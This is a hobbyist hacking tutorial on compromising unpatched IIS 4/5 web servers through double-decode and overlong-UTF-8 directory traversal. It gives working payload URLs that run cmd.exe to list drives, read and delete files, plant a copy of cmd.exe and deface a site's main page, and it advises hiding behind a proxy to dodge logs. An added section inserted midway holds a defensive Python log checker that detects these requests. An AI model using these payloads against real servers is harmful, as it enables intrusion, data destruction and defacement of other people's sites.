Hacking/Cracking IIS 4/5


All of this works on IIS 4 and 5 servers
without any security updates!

maac@mail1.stofanet.dk Made By Truti |

************ INTRO:

Hacking an IIS server is pretty much like taking candy from a baby.
No really, it's that easy. In this tutorial I'm going to walk you through 0wnz'ing
your very own IIS server and show you how to deface the site, but I seriously don't
encourage this. I don't agree with needless defacing unless it's your first time,
but I'm not against defacing to stand up for your rights, to punish a site with bad
intentions (even though the site can be rebuilt) or to make a strong point. If you're
going to use the *I defaced your site because it had bad security* excuse, you could just
as easily mail the admin. I'm telling you all how to do this so you know how easy it
is. Please don't abuse the information I give you.

---------------------------------------------
************ Finding vulnerable servers:

There are *many, many* vulnerabilities in IIS, but I'm going to discuss one of the
latest. This vulnerability allows the execution of arbitrary code: the %255c in each link
is a double-encoded backslash, an unpatched server decodes it twice and the ..\ walks out
of the web directory into winnt\system32. To see if a site is vulnerable, try these links:

www.TARGET.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

www.TARGET.com/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

If the server is vulnerable you should get a listing of the C drive.
If none of these links work, the server probably isn't vulnerable.

OK, so let's say you got a listing of the C drive's contents. It should look something like:

---------------------------------------------
Directory of c:\

11/15/02 08:50a (DIR) WINNT
11/15/02 09:15a (DIR) Program Files
11/15/02 09:20a (DIR) TEMP
11/15/02 09:21a (DIR) CPQ SYSTEM
11/15/02 09:50a (DIR) Inetpub
11/27/02 08:11a (DIR) CPQSUPSW
11/29/02 09:12a (DIR) CA_LIC
12/01/02 09:42a 140 server ip address.txt
04/06/02 04:44p 55,769 systemlog 06-04.txt
05/04/02 12:32p (DIR) test

10 File(s) 1,159,703,933 bytes
1,322,123,264 bytes free
---------------------------------------------

To navigate, just change the end of the link. For example, to list the WINNT directory:
/system32/cmd.exe?/c+dir+c:\winnt

To navigate to a folder with a space in its name, such as CPQ SYSTEM, you have to use the
DOS short name:
/system32/cmd.exe?/c+dir+c:\cpqsys~1
That is the first six characters of the name, with the spaces removed, followed by ~1
(normal DOS rules). Practise at the DOS prompt on your own PC (or wherever there is a
Win32 b0x); it helps a lot when it comes to simple commands such as copy or listing the
contents of a directory.

Now, in order to find the main page of the website, we must find the webroot. The webroot
is the directory in which all the files for the site are kept, including the main page. In
my experience the webroot is usually on the D: drive, but it can be any directory the
admin chooses.

Try:
/system32/cmd.exe?/c+dir+d:\
This should list the contents of the D: drive. Another good tip: a lot of sites have
*mock* webroots, where you think you have found the site's main page but it's really
just a copy. You will have to visit the site, find the size of the main page and of the
other pages linked to it (right click and choose Properties, the normal Win32 trick), and
match those sizes against the files in the webroot to find the real main page.

---------------------------------------
Now is a good time to give you some commands that will come in useful. These use the
%c0%af (Unicode) form of the same ..\ traversal instead of %255c; both work on an
unpatched server:

To list all files of a chosen type anywhere on the server use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever

To DOWNLOAD (type out) a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20type%20c:\whatever.file

When asked "What would you like to do with this file?" choose *run this program from its
current location*. Choosing "save to disk" will just get you a properties report of that
file or something like that.

To DELETE (del) a file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\whatever.file

To make a text file use:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20Your text goes here!!!!!>%20test.txt
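The flip side of the %255c links in the "Finding vulnerable servers" section and the %c0%af commands above is what an admin sees in the IIS log, and the tutorial's own warning that IIS logs everything is exactly right. The following is an added example, not part of the original tutorial: a small Python log checker that decodes a request path the way an unpatched IIS 4/5 did (a second %-decoding pass, so %255c becomes a backslash, and acceptance of overlong UTF-8, so %c0%af becomes a slash), then flags requests that climb above the web root or name cmd.exe. The request lines and all function names are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request lines in the style of an IIS access log (not real logs).
SAMPLE_REQUESTS = [
    "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\ HTTP/1.0",
    "GET /msadc/..%c0%af..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c%20dir%20c:\\ HTTP/1.0",
    "GET /index.htm HTTP/1.0",
    "GET /images/logo.gif HTTP/1.0",
    "GET /home/site/CMD.exe?/c%20echo%20x>%20page.html HTTP/1.0",
]


def decode_overlong_utf8(data: bytes) -> str:
    """Decode bytes, accepting the overlong two-byte UTF-8 forms (lead bytes
    0xC0/0xC1) that a strict decoder rejects: C0 AF -> '/', C1 9C -> '\\'.
    Any other byte is kept as its Latin-1 character."""
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def iis_style_decode(raw_path: str) -> str:
    """Reproduce the two decoding mistakes the tutorial relies on:
    1. a second %-decoding pass, so %255c -> %5c -> '\\' (double decode);
    2. acceptance of overlong UTF-8, so %c0%af -> '/' (the Unicode bug)."""
    once = unquote_to_bytes(raw_path)
    twice = unquote_to_bytes(once)  # unquote_to_bytes accepts bytes input
    return decode_overlong_utf8(twice)


def escapes_webroot(decoded_path: str) -> bool:
    """Walk the path segments; depth below zero means '..' climbed above the root."""
    depth = 0
    for seg in decoded_path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def analyze_request(line: str) -> dict:
    """Parse a 'METHOD target HTTP/x' line and report traversal indicators."""
    parts = line.split()
    target = parts[1] if len(parts) >= 2 else line
    raw_path, _, _query = target.partition("?")
    decoded = iis_style_decode(raw_path)
    normalized = decoded.replace("\\", "/").lower()
    basename = normalized.rsplit("/", 1)[-1]
    return {
        "raw": target,
        "decoded_path": decoded,
        "traversal": escapes_webroot(decoded),
        "cmd_exe": basename == "cmd.exe",
        "system32": "/winnt/system32/" in normalized,
        "double_encoded": "%25" in raw_path.lower(),
        "overlong_utf8": bool(re.search(r"%c[01]%[89ab][0-9a-f]", raw_path, re.I)),
    }


def is_suspicious(report: dict) -> bool:
    """A web server has no business serving cmd.exe or paths above its root."""
    return report["traversal"] or report["cmd_exe"] or report["system32"]


def scan(lines):
    """Return the reports for every request line that looks like this attack."""
    return [r for r in map(analyze_request, lines) if is_suspicious(r)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit["raw"], "->", hit["decoded_path"])
```

Run against the constructed lines it flags three of the five requests: the %255c and %c0%af traversals, and the echo through the copied CMD.exe, which never leaves the web root but is caught by the file name. Note that a plain string match on "..%5c" or "../" in the raw log would miss the first two entirely; the decode step is what makes the check work.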

--------------------------------------
************ Changing the mainpage.htm

Now on to the important part: editing the website's main page. HTML is not needed, but if
you want an in any way decent looking defacement you need to know it. If you don't know it,
don't worry: any text in a file with a .htm or .html extension will show up in a browser.
Anybody can learn HTML; I learned the basics in about a day.
OK, enough girlie talk, on to the main stuff: you have to copy the file CMD.exe to the
directory with the page in it. Let's call this page wannabie_admin.html and say the
directory wannabie_admin.html is in is C:\home\site.

So the COPY command:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20C:\home\site\CMD.exe
That will copy CMD.exe (like command.com in Win98) to C:\home\site

Now to echo the text we want into wannabie_admin.html, using the copied CMD.exe:
www.TARGET.com/whatever/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/home/site/CMD.exe?/c%20echo%20Damn Wannabies! You run IIS and you just been cracked>%20wannabie_admin.html

Now your text should be on the main page. If you echo HTML code into wannabie_admin.html
you'll get a much better defacement. If you're going to do it, do it RIGHT!

--------------------------------------
Please, please listen to me: IIS servers >>>-LOG-<<< everything! So use a >>>-PROXY-<<<
or else pay the price!
--------------------------------------
BTW, a very useful tool is Twwwscan... It can be found via www.google.com!


Credits

maac@mail1.stofanet.dk Made By Truti